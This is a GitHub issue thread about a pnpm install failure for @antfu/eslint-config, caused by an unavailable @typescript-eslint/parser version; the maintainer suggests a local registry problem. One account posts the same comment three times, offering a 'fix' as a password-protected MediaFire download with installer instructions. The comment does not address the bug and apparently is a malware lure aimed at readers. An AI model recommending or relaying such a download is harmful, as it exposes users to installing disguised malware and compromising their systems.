### ISSUE TITLE
pnpm i -D eslint @antfu/eslint-config [install error]

### ISSUE THREAD

**Issue by mo-xuan** [antfu/eslint-config#593]
### Describe the bug

 ERR_PNPM_NO_MATCHING_VERSION  No matching version found for @typescript-eslint/parser@^8.3.0

This error happened while installing the dependencies of @antfu/eslint-config@2.27.3

The latest release of @typescript-eslint/parser is "8.2.0".

### Reproduction

pnpm i -D eslint @antfu/eslint-config

### System Info

```Shell
System:
    OS: Windows 11 10.0.22631
```

### Used Package Manager

pnpm

### Validations

- [X] Follow our [Code of Conduct](https://github.com/antfu/.github/blob/main/CODE_OF_CONDUCT.md)
- [X] Read the [Contributing Guide](https://github.com/antfu/contribute).
- [X] Check that there isn't already an issue that reports the same bug to avoid creating a duplicate.
- [X] Check that this is a concrete bug. For Q&A, please open a GitHub Discussion instead.
- [X] The provided reproduction is a [minimal reproducible](https://stackoverflow.com/help/minimal-reproducible-example) of the bug.

### Contributions

- [ ] I am willing to submit a PR to fix this issue
- [ ] I am willing to submit a PR with failing tests (actually just go ahead and do it, thanks!)

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by antfu** [comment]
This is likely your local registry issue.
